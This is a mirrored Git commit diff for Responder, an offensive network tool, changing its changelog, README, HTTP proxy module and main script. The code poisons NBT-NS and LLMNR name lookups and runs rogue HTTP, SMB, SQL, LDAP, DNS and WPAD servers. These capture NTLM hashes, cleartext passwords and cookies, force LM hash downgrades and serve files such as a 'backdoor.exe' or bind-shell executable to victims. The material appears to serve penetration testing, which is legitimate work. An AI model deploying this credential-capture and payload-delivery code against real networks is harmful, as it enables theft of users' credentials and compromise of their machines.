github/Responder
1
0
Fork 0
mirror of https://github.com/lgandx/Responder.git synced 2025-07-30 19:40:21 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Added: Configuration file, removed several cli options and several fixes.

Browse source
This commit is contained in:
lgandx 2013-11-08 21:23:09 -05:00
parent d57310273d
commit 95eed09942
4 changed files with 138 additions and 153 deletions
Download patch file Download diff file Expand all files Collapse all files

6
CHANGELOG.txt
View file

@ -1,4 +1,8 @@
ChangeLog from 0.6 to 1.9:
ChangeLog Responder 1.9:
- Added: Ability to change the HTML payload returned after authentication. See Responder.conf
- Added: Ability to change the pac script in Responder.conf
- Added: Configuration file for Responder. See Responder.conf
- Removed: Several options removed.
- Added: Bind shell which when executed on a victim workstation, will bind cmd.exe to port 140.
- Added: -e, --exe, --file option for serving specific files via the HTTP and WPAD server.
- Added: Ability to bind Responder to a specific interface

20
HTTPProxy.py
View file

@ -92,6 +92,26 @@ class ServeAlwaysExeFile(Packet):
def calculate(self):
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
class ServeAlwaysNormalFile(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 200 OK\r\n"),
("ContentType", "Content-Type: text/html\r\n"),
("LastModified", "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"),
("AcceptRanges", "Accept-Ranges: bytes\r\n"),
("Server", "Server: Microsoft-IIS/7.5\r\n"),
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
("ContentLen", "Content-Length: "),
("ActualLen", "76"),
("Date", "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
("Connection", "Connection: keep-alive\r\n"),
("X-CCC", "US\r\n"),
("X-CID", "2\r\n"),
("CRLF", "\r\n"),
("Payload", "jj"),
])
def calculate(self):
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
#HTTP Packet used for further NTLM auth.
class IIS_Auth_407_Ans(Packet):
fields = OrderedDict([

69
README.txt
View file

@ -11,7 +11,7 @@ suffix (see: http://support.microsoft.com/kb/163409). By default, the
tool will only answers to File Server Service request, which is for SMB.
The concept behind this, is to target our answers, and be stealthier on
the network. This also helps to ensure that we don't break legitimate
NBT-NS behavior. You can set the -r option to 1 via command line if
NBT-NS behavior. You can set the -r option to "On" via command line if
you want this tool to answer to the Workstation Service request name
suffix.
@ -22,12 +22,12 @@ FEATURES
Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default.
Successfully tested from Windows 95 to Server 2012 RC, Samba and Mac OSX Lion.
Clear text password is supported for NT4, and LM hashing downgrade when the
--lm option is set to 1. This functionality is enabled by default when the
--lm option is set to On. This functionality is enabled by default when the
tool is launched.
- Built-in MSSQL Auth server.
In order to redirect SQL Authentication to this tool, you will need to
set the option -r to 1(NBT-NS queries for SQL Server lookup are using
set the option -r to On(NBT-NS queries for SQL Server lookup are using
the Workstation Service name suffix) for systems older than windows
Vista (LLMNR will be used for Vista and higher). This server supports
NTLMv1, LMv2 hashes. This functionality was successfully tested on
@ -35,7 +35,7 @@ FEATURES
- Built-in HTTP Auth server.
In order to redirect HTTP Authentication to this tool, you will need
to set the option -r to 1 for Windows version older than Vista (NBT-NS
to set the option -r to On for Windows version older than Vista (NBT-NS
queries for HTTP server lookup are sent using the Workstation Service
name suffix). For Vista and higher, LLMNR will be used. This server
supports NTLMv1, NTLMv2 hashes *and* Basic Authentication. This server
@ -45,7 +45,7 @@ FEATURES
- Built-in HTTPS Auth server.
In order to redirect HTTPS Authentication to this tool, you will need
 to set the -r option to 1 for Windows versions older than Vista (NBT-NS
 to set the -r option to On for Windows versions older than Vista (NBT-NS
 queries for HTTP server lookups are sent using the Workstation Service
 name suffix). For Vista and higher, LLMNR will be used. This server
 supports NTLMv1, NTLMv2, *and* Basic Authentication. This server
@ -57,7 +57,7 @@ FEATURES
- Built-in LDAP Auth server.
In order to redirect LDAP Authentication to this tool, you will need
to set the option -r to 1 for Windows version older than Vista (NBT-NS
to set the option -r to On for Windows version older than Vista (NBT-NS
queries for HTTP server lookup are sent using the Workstation Service
name suffix). For Vista and higher, LLMNR will be used. This server
supports NTLMSSP hashes and Simple Authentication (clear text authentication).
@ -86,7 +86,9 @@ FEATURES
- WPAD rogue transparent proxy server. This module will *silently* grab the encrypted
credentials of anyone launching Internet Explorer on the network. It will also grab
the cookie of the requested page. This module is higly effective. You can now send your custom files to a victim.
the cookie of the requested page. This module is higly effective. You can now send your custom Pac script to a victim. See Responder.conf.
- Responder is now using a configuration file. See Responder.conf.
CONSIDERATIONS
==============
@ -107,13 +109,14 @@ CONSIDERATIONS
USAGE
=====
First of all, please take a look at Responder.conf and set it for your needs.
Running this tool:
- python Responder.py [options]
Usage Example:
python Responder.py -i 10.20.30.40 -b 1 -r 0 -f On
python Responder.py -i 10.20.30.40 -b On -r On
Options List:
@ -122,62 +125,24 @@ Options List:
-i 10.20.30.40, --ip=10.20.30.40 The ip address to redirect the traffic to.
(usually yours)
-b 0, --basic=0 Set this to 1 if you want to return a
Basic HTTP authentication. 0 will return
-b Off, --basic=Off Set this to On if you want to return a
Basic HTTP authentication. Off will return
an NTLM authentication.
-s Off, --http=Off Set this to On or Off to start/stop the
HTTP server. Default value is On.
-S Off, --smb=Off Set this to On or Off to start/stop the
SMB server. Default value is On.
-q Off, --sql=Off Set this to On or Off to start/stop the
SQL server. Default value is On.
-r 0, --wredir=0 Set this to enable answers for netbios
-r Off, --wredir=Off Set this to On to enable answers for netbios
wredir suffix queries. Answering to wredir
will likely break stuff on the network
(like classics 'nbns spoofer' will).
Default value is therefore set to Off (0).
-c 1122334455667788, --challenge= The server challenge to set for NTLM
authentication. If not set, then defaults
to 1122334455667788, the most common
challenge for existing Rainbow Tables.
-l file.log, --logfile=filename.log Log file to use for Responder session.
Default value is therefore set to Off.
-f Off, --fingerprint=Off This option allows you to fingerprint a
host that issued an NBT-NS or LLMNR query.
-F On, --ftp=On Set this to On or Off to start/stop the FTP server.
Default value is On
-L On, --ldap=On Set this to On or Off to start/stop the LDAP server.
Default value is On
-D On, --dns=On Set this to On or Off to start/stop the DNS server.
Default value is On
-w On, --wpad=On Set this to On or Off to start/stop the WPAD rogue
proxy server. Default value is On
--lm=0 Set this to 1 if you want to force LM hashing
downgrade for Windows XP/2003 and earlier. Default value is False (0)
-e 0 Set this option to 1 if you'd like to serve a specific
file via http & WPAD proxy server when one of these
extensions are present in the url. Default value is
False (0)
--exe=0 Set this option to 1 if you'd like to always serve a
specific file via http & WPAD proxy server. It's best
to use this option with the --file option. Default
value is False (0)
--file=backdoor.exe Serve a specific file when using -e option. Default is
FixInternet.exe (provided with Responder)
--lm=Off Set this to On if you want to force LM hashing
downgrade for Windows XP/2003 and earlier. Default value is Off
For more information read these posts:

196
Responder.py
View file

@ -16,7 +16,7 @@
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys,struct,SocketServer,re,optparse,socket,thread,Fingerprint,random,os
import sys,struct,SocketServer,re,optparse,socket,thread,Fingerprint,random,os,ConfigParser
from Fingerprint import RunSmbFinger,OsNameClientVersion
from odict import OrderedDict
from socket import inet_aton
@ -27,41 +27,15 @@ parser = optparse.OptionParser(usage='python %prog -i 10.20.30.40 -b 1 -s On -r
)
parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="OURIP")
parser.add_option('-I','--interfaceIP', action="store", help="The IP you want Responder to listen on, default is 0.0.0.0 (all interfaces)", metavar="10.20.30.40",dest="BOUND_TO_IP")
parser.add_option('-b', '--basic',action="store", help="Set this to On if you want to return a Basic HTTP authentication. Off will return an NTLM authentication.This option is mandatory.", metavar="Off",dest="Basic", choices=['On','ON','Off','OFF'], default="Off")
parser.add_option('-b', '--basic',action="store", help="Set this to 1 if you want to return a Basic HTTP authentication. 0 will return an NTLM authentication.This option is mandatory.", metavar="0",dest="Basic", choices=['0','1'], default="0")
parser.add_option('-r', '--wredir',action="store", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' will). Default value is therefore set to Off", metavar="Off",dest="Wredirect", choices=['On','ON','Off','OFF'], default="Off")
parser.add_option('-s', '--http',action="store", help="Set this to On or Off to start/stop the HTTP server. Default value is On", metavar="Off",dest="on_off", choices=['On','Off'], default="On")
parser.add_option('-f','--fingerprint', action="store", dest="Finger", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.", metavar="Off", choices=['On','ON','Off','OFF'], default="Off")
parser.add_option('--ssl',action="store", help="Set this to On or Off to start/stop the HTTPS server. Default value is On", metavar="Off",dest="SSL_On_Off", choices=['On','Off'], default="On")
parser.add_option('-w','--wpad', action="store", dest="WPAD_On_Off", help = "Set this to On or Off to start/stop the WPAD rogue proxy server. Default value is Off", metavar="Off", choices=['On','ON','Off','OFF'], default="Off")
parser.add_option('-S', '--smb',action="store", help="Set this to On or Off to start/stop the SMB server. Default value is On", metavar="Off",dest="SMB_on_off", choices=['On','Off'], default="On")
parser.add_option('-q', '--sql',action="store", help="Set this to On or Off to start/stop the SQL server. Default value is On", metavar="Off",dest="SQL_on_off", choices=['On','Off'], default="On")
parser.add_option('-r', '--wredir',action="store", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' will). Default value is therefore set to Off (0)", metavar="0",dest="Wredirect", choices=['1','0'], default="0")
parser.add_option('-c','--challenge', action="store", dest="optChal", help = "The server challenge to set for NTLM authentication. If not set, then defaults to 1122334455667788, the most common challenge for existing Rainbow Tables", metavar="1122334455667788", default="1122334455667788")
parser.add_option('-l','--logfile', action="store", dest="sessionLog", help = "Log file to use for Responder session. ", metavar="Responder-Session.log", default="Responder-Session.log")
parser.add_option('-f','--fingerprint', action="store", dest="Finger", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.", metavar="Off", choices=['On','Off'], default="Off")
parser.add_option('-F','--ftp', action="store", dest="FTP_On_Off", help = "Set this to On or Off to start/stop the FTP server. Default value is On", metavar="On", choices=['On','Off'], default="On")
parser.add_option('-L','--ldap', action="store", dest="LDAP_On_Off", help = "Set this to On or Off to start/stop the LDAP server. Default value is On", metavar="On", choices=['On','Off'], default="On")
parser.add_option('-D','--dns', action="store", dest="DNS_On_Off", help = "Set this to On or Off to start/stop the DNS server. Default value is On", metavar="On", choices=['On','Off'], default="On")
parser.add_option('-w','--wpad', action="store", dest="WPAD_On_Off", help = "Set this to On or Off to start/stop the WPAD rogue proxy server. Default value is Off", metavar="Off", choices=['On','Off'], default="Off")
parser.add_option('--lm',action="store", help="Set this to 1 if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False (0)", metavar="0",dest="LM_On_Off", choices=['0','1'], default="0")
parser.add_option('-e',action="store", help="Set this option to 1 if you'd like to serve a specific file via http & WPAD proxy server when one of these extensions are present in the url. Default value is False (0)", metavar="0",dest="Exe_On_Off", choices=['0','1'], default="0")
parser.add_option('--exe',action="store", help="Set this option to 1 if you'd like to always serve a specific file via http & WPAD proxy server. It's best to use this option with the --file option. Default value is False (0)", metavar="0",dest="Exec_Mode_On_Off", choices=['0','1'], default="0")
parser.add_option('--file',action="store", help="Serve a specific file when using -e option. Default is FixInternet.exe (provided with Responder)", metavar="backdoor.exe",dest="FILENAME", default="FixInternet.exe")
parser.add_option('--lm',action="store", help="Set this to Off if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is Off", metavar="Off",dest="LM_On_Off", choices=['On','ON','Off','OFF'], default="Off")
options, args = parser.parse_args()
@ -70,39 +44,46 @@ if options.OURIP is None:
parser.print_help()
exit(-1)
if len(options.optChal) is not 16:
#Config parsing
config = ConfigParser.ConfigParser()
config.read('Responder.conf')
# Set some vars.
BIND_TO_IP = config.get('Responder Core', 'Bind_to')
On_Off = config.get('Responder Core', 'HTTP').upper()
SSL_On_Off = config.get('Responder Core', 'HTTPS').upper()
SMB_On_Off = config.get('Responder Core', 'SMB').upper()
SQL_On_Off = config.get('Responder Core', 'SQL').upper()
FTP_On_Off = config.get('Responder Core', 'FTP').upper()
LDAP_On_Off = config.get('Responder Core', 'LDAP').upper()
DNS_On_Off = config.get('Responder Core', 'DNS').upper()
NumChal = config.get('Responder Core', 'Challenge')
SessionLog = config.get('Responder Core', 'SessionLog')
Exe_On_Off = config.get('HTTP Server', 'Serve-Exe').upper()
Exec_Mode_On_Off = config.get('HTTP Server', 'Serve-Always').upper()
FILENAME = config.get('HTTP Server', 'Filename')
WPAD_Script = config.get('HTTP Server', 'WPADScript')
#Cli options.
OURIP = options.OURIP
LM_On_Off = options.LM_On_Off.upper()
WPAD_On_Off = options.WPAD_On_Off.upper()
Wredirect = options.Wredirect.upper()
Basic = options.Basic.upper()
Finger_On_Off = options.Finger.upper()
if BIND_TO_IP == None:
BIND_TO_IP = ''
if len(NumChal) is not 16:
print "The challenge must be exactly 16 chars long.\nExample: -c 1122334455667788\n"
parser.print_help()
exit(-1)
#Logger
import logging
logging.basicConfig(filename=str(options.sessionLog),level=logging.INFO,format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
logging.basicConfig(filename=str(SessionLog),level=logging.INFO,format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
logging.warning('Responder Started')
# Set some vars.
OURIP = options.OURIP
BOUND_TO_IP = options.BOUND_TO_IP
Basic = options.Basic
On_Off = options.on_off.upper()
Exe_On_Off = options.Exe_On_Off
Exec_Mode_On_Off =options.Exec_Mode_On_Off
FILENAME = options.FILENAME
SSL_On_Off = options.SSL_On_Off.upper()
SMB_On_Off = options.SMB_on_off.upper()
SQL_On_Off = options.SQL_on_off.upper()
FTP_On_Off = options.FTP_On_Off.upper()
LDAP_On_Off = options.LDAP_On_Off.upper()
Finger_On_Off = options.Finger.upper()
DNS_On_Off = options.DNS_On_Off.upper()
WPAD_On_Off = options.WPAD_On_Off.upper()
LM_On_Off = options.LM_On_Off.upper()
Wredirect = options.Wredirect
NumChal = options.optChal
if BOUND_TO_IP == None:
BOUND_TO_IP = ''
def Show_Help(ExtraHelpData):
help = "NBT Name Service/LLMNR Answerer 1.0.\nPlease send bugs/comments to: lgaffie@trustwave.com\nTo kill this script hit CRTL-C\n\n"
help+= ExtraHelpData
@ -131,7 +112,7 @@ Challenge = ""
for i in range(0,len(NumChal),2):
Challenge += NumChal[i:i+2].decode("hex")
Show_Help("[+]NBT-NS & LLMNR responder started\nGlobal Parameters set:\nChallenge set is: %s\nWPAD Proxy Server is:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\nServing Executable via HTTP&WPAD is:%s\nAlways serving executable via HTTP&WPAD is:%s\n\n"%(NumChal,WPAD_On_Off,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off,Exe_On_Off,Exec_Mode_On_Off))
Show_Help("[+]NBT-NS & LLMNR responder started\n[+]Loading Responder.conf File..\nGlobal Parameters set:\nChallenge set is: %s\nWPAD Proxy Server is:%s\nWPAD script loaded:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\nServing Executable via HTTP&WPAD is:%s\nAlways Serving a Specific File via HTTP&WPAD is:%s\n\n"%(NumChal,WPAD_On_Off,WPAD_Script,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off,Exe_On_Off,Exec_Mode_On_Off))
#Simple NBNS Services.
W_REDIRECT = "\x41\x41\x00"
@ -191,7 +172,7 @@ class NBT_Ans(Packet):
def Validate_NBT_NS(data,Wredirect):
if FILE_SERVER == data[43:46]:
return True
if Wredirect == "1":
if Wredirect == "ON":
if W_REDIRECT == data[43:46]:
return True
else:
@ -909,7 +890,7 @@ def WpadCustom(data,client):
Message = "[+]WPAD file sent to: %s"%(client)
print Message
logging.warning(Message)
buffer1 = WPADScript()
buffer1 = WPADScript(Payload=WPAD_Script)
buffer1.calculate()
return str(buffer1)
else:
@ -917,13 +898,13 @@ def WpadCustom(data,client):
# Function used to check if we answer with a Basic or NTLM auth.
def Basic_Ntlm(Basic):
if Basic == "1":
if Basic == "ON":
return IIS_Basic_401_Ans()
if Basic == "0":
if Basic == "OFF":
return IIS_Auth_401_Ans()
def ServeEXE(data,client, Filename):
Message = "[+]Exe file sent to: %s . Try telnet %s on port 140"%(client,client)
Message = "[+]Sent %s file sent to: %s."%(Filename,client)
print Message
logging.warning(Message)
with open (Filename, "rb") as bk:
@ -932,33 +913,42 @@ def ServeEXE(data,client, Filename):
return data
def ServeEXEOrNot(on_off):
if Exe_On_Off == "1":
if Exe_On_Off == "ON":
return True
if Exe_On_Off == "0":
if Exe_On_Off == "OFF":
return False
def ServeEXECAlwaysOrNot(on_off):
if Exec_Mode_On_Off == "1":
if Exec_Mode_On_Off == "ON":
return True
if Exec_Mode_On_Off == "0":
if Exec_Mode_On_Off == "OFF":
return False
Exec_Mode_On_Off
def IsExecutable(Filename):
exe = re.findall('.exe',Filename)
if exe:
return True
else:
return False
#Handle HTTP packet sequence.
def PacketSequence(data,client):
a = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
b = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
if ServeEXEOrNot(Exe_On_Off) and re.findall('.exe', data):
payload = ServeEXE(data,client,FILENAME)
buffer1 = ServerExeFile(Payload = payload,filename=FILENAME)
File = config.get('HTTP Server', 'ExecFilename')
buffer1 = ServerExeFile(Payload = ServeEXE(data,client,File),filename=File)
buffer1.calculate()
return str(buffer1)
if ServeEXECAlwaysOrNot(Exec_Mode_On_Off):
payload = ServeEXE(data,client,FILENAME)
buffer1 = ServeAlwaysExeFile(Payload = payload,ContentDiFile=FILENAME)
buffer1.calculate()
return str(buffer1)
if IsExecutable(FILENAME):
buffer1 = ServeAlwaysExeFile(Payload = ServeEXE(data,client,FILENAME),ContentDiFile=FILENAME)
buffer1.calculate()
return str(buffer1)
else:
buffer1 = ServeAlwaysNormalFile(Payload = ServeEXE(data,client,FILENAME))
buffer1.calculate()
return str(buffer1)
if a:
packetNtlm = b64decode(''.join(a))[8:9]
if packetNtlm == "\x01":
@ -972,7 +962,7 @@ def PacketSequence(data,client):
if packetNtlm == "\x03":
NTLM_Auth= b64decode(''.join(a))
ParseHTTPHash(NTLM_Auth,client)
buffer1 = IIS_Auth_Granted()
buffer1 = IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe'))
buffer1.calculate()
return str(buffer1)
if b:
@ -981,7 +971,7 @@ def PacketSequence(data,client):
WriteData(outfile,b64decode(''.join(b)), b64decode(''.join(b)))
print "[+]HTTP-User & Password:", b64decode(''.join(b))
logging.warning('[+]HTTP-User & Password: %s'%(b64decode(''.join(b))))
buffer1 = IIS_Auth_Granted()
buffer1 = IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe'))
buffer1.calculate()
return str(buffer1)
@ -1049,9 +1039,9 @@ def HostDidntAuthBefore(client):
return True
def ProxyBasic_Ntlm(Basic):
if Basic == "1":
if Basic == "ON":
return IIS_Basic_407_Ans()
if Basic == "0":
if Basic == "OFF":
return IIS_Auth_407_Ans()
def ParseDomain(data,client):
@ -1071,15 +1061,19 @@ def ProxyPacketSequence(data,client):
a = re.findall('(?<=Proxy-Authorization: NTLM )[^\\r]*', data)
b = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
if ServeEXEOrNot(Exe_On_Off) and re.findall('.exe', data):
payload = ServeEXE(data,client,FILENAME)
buffer1 = ServerExeFile(Payload = payload, filename=FILENAME)
File = config.get('HTTP Server', 'ExecFilename')
buffer1 = ServerExeFile(Payload = ServeEXE(data,client,File),filename=File)
buffer1.calculate()
return str(buffer1)
if ServeEXECAlwaysOrNot(Exec_Mode_On_Off):
payload = ServeEXE(data,client,FILENAME)
buffer1 = ServeAlwaysExeFile(Payload = payload,ContentDiFile=FILENAME)
buffer1.calculate()
return str(buffer1)
if IsExecutable(FILENAME):
buffer1 = ServeAlwaysExeFile(Payload = ServeEXE(data,client,FILENAME),ContentDiFile=FILENAME)
buffer1.calculate()
return str(buffer1)
else:
buffer1 = ServeAlwaysNormalFile(Payload = ServeEXE(data,client,FILENAME))
buffer1.calculate()
return str(buffer1)
if a:
packetNtlm = b64decode(''.join(a))[8:9]
if packetNtlm == "\x01":
@ -1199,7 +1193,7 @@ def HTTPSPacketSequence(data,client):
if packetNtlm == "\x03":
NTLM_Auth= b64decode(''.join(a))
ParseHTTPSHash(NTLM_Auth,client)
buffer1 = str(IIS_Auth_Granted())
buffer1 = str(IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe')))
return buffer1
if b:
GrabCookie(data,client)
@ -1207,7 +1201,7 @@ def HTTPSPacketSequence(data,client):
WriteData(outfile,b64decode(''.join(b)), b64decode(''.join(b)))
print "[+]HTTPS-User & Password:", b64decode(''.join(b))
logging.warning('[+]HTTPS-User & Password: %s'%(b64decode(''.join(b))))
buffer1 = str(IIS_Auth_Granted())
buffer1 = str(IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe')))
return buffer1
else:
@ -1217,8 +1211,8 @@ class SSlSock(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
def __init__(self, server_address, RequestHandlerClass):
SocketServer.BaseServer.__init__(self, server_address, RequestHandlerClass)
ctx = SSL.Context(SSL.SSLv3_METHOD)
cert = 'Certs/responder.crt'
key = 'Certs/responder.key'
cert = config.get('HTTPS Server', 'cert')
key = config.get('HTTPS Server', 'key')
ctx.use_privatekey_file(key)
ctx.use_certificate_file(cert)
self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
@ -1402,59 +1396,59 @@ class LDAP(SocketServer.BaseRequestHandler):
#Function name self-explanatory
def Is_HTTP_On(on_off):
if on_off == "ON":
return thread.start_new(serve_thread_tcp,(BOUND_TO_IP, 80,HTTP))
return thread.start_new(serve_thread_tcp,(BIND_TO_IP, 80,HTTP))
if on_off == "OFF":
return False
#Function name self-explanatory
def Is_HTTPS_On(SSL_On_Off):
if SSL_On_Off == "ON":
return thread.start_new(serve_thread_SSL,(BOUND_TO_IP, 443,DoSSL))
return thread.start_new(serve_thread_SSL,(BIND_TO_IP, 443,DoSSL))
if SSL_On_Off == "OFF":
return False
#Function name self-explanatory
def Is_WPAD_On(on_off):
if on_off == "ON":
return thread.start_new(serve_thread_tcp,(BOUND_TO_IP, 3141,HTTPProxy))
return thread.start_new(serve_thread_tcp,(BIND_TO_IP, 3141,HTTPProxy))
if on_off == "OFF":
return False
#Function name self-explanatory
def Is_SMB_On(SMB_On_Off):
if SMB_On_Off == "ON":
if LM_On_Off == "1":
return thread.start_new(serve_thread_tcp, (BOUND_TO_IP, 445,SMB1LM)),thread.start_new(serve_thread_tcp,('', 139,SMB1LM))
if LM_On_Off == "ON":
return thread.start_new(serve_thread_tcp, (BIND_TO_IP, 445,SMB1LM)),thread.start_new(serve_thread_tcp,(BIND_TO_IP, 139,SMB1LM))
else:
return thread.start_new(serve_thread_tcp, (BOUND_TO_IP, 445,SMB1)),thread.start_new(serve_thread_tcp,('', 139,SMB1))
return thread.start_new(serve_thread_tcp, (BIND_TO_IP, 445,SMB1)),thread.start_new(serve_thread_tcp,(BIND_TO_IP, 139,SMB1))
if SMB_On_Off == "OFF":
return False
#Function name self-explanatory
def Is_SQL_On(SQL_On_Off):
if SQL_On_Off == "ON":
return thread.start_new(serve_thread_tcp,(BOUND_TO_IP, 1433,MSSQL))
return thread.start_new(serve_thread_tcp,(BIND_TO_IP, 1433,MSSQL))
if SQL_On_Off == "OFF":
return False
#Function name self-explanatory
def Is_FTP_On(FTP_On_Off):
if FTP_On_Off == "ON":
return thread.start_new(serve_thread_tcp,(BOUND_TO_IP, 21,FTP))
return thread.start_new(serve_thread_tcp,(BIND_TO_IP, 21,FTP))
if FTP_On_Off == "OFF":
return False
#Function name self-explanatory
def Is_LDAP_On(LDAP_On_Off):
if LDAP_On_Off == "ON":
return thread.start_new(serve_thread_tcp,(BOUND_TO_IP, 389,LDAP))
return thread.start_new(serve_thread_tcp,(BIND_TO_IP, 389,LDAP))
if LDAP_On_Off == "OFF":
return False
#Function name self-explanatory
def Is_DNS_On(DNS_On_Off):
if DNS_On_Off == "ON":
return thread.start_new(serve_thread_udp,(BOUND_TO_IP, 53,DNS)),thread.start_new(serve_thread_tcp,('', 53,DNSTCP))
return thread.start_new(serve_thread_udp,(BIND_TO_IP, 53,DNS)),thread.start_new(serve_thread_tcp,(BIND_TO_IP, 53,DNSTCP))
if DNS_On_Off == "OFF":
return False
@ -1475,6 +1469,7 @@ def serve_thread_tcp(host, port, handler):
server.serve_forever()
except:
print "Error starting TCP server on port " + str(port) + ". Check that you have the necessary permissions (i.e. root) and no other servers are running."
raise
def serve_thread_SSL(host, port, handler):
try:
@ -1494,9 +1489,9 @@ def main():
Is_LDAP_On(LDAP_On_Off)
Is_DNS_On(DNS_On_Off)
#Browser listener loaded by default
thread.start_new(serve_thread_udp,(BOUND_TO_IP, 138,Browser))
thread.start_new(serve_thread_udp,(BIND_TO_IP, 138,Browser))
## Poisoner loaded by default, it's the purpose of this tool...
thread.start_new(serve_thread_udp,(BOUND_TO_IP, 137,NB))
thread.start_new(serve_thread_udp,(BIND_TO_IP, 137,NB))
thread.start_new(RunLLMNR())
except KeyboardInterrupt:
exit()
@ -1508,3 +1503,4 @@ if __name__ == '__main__':
raise
raw_input()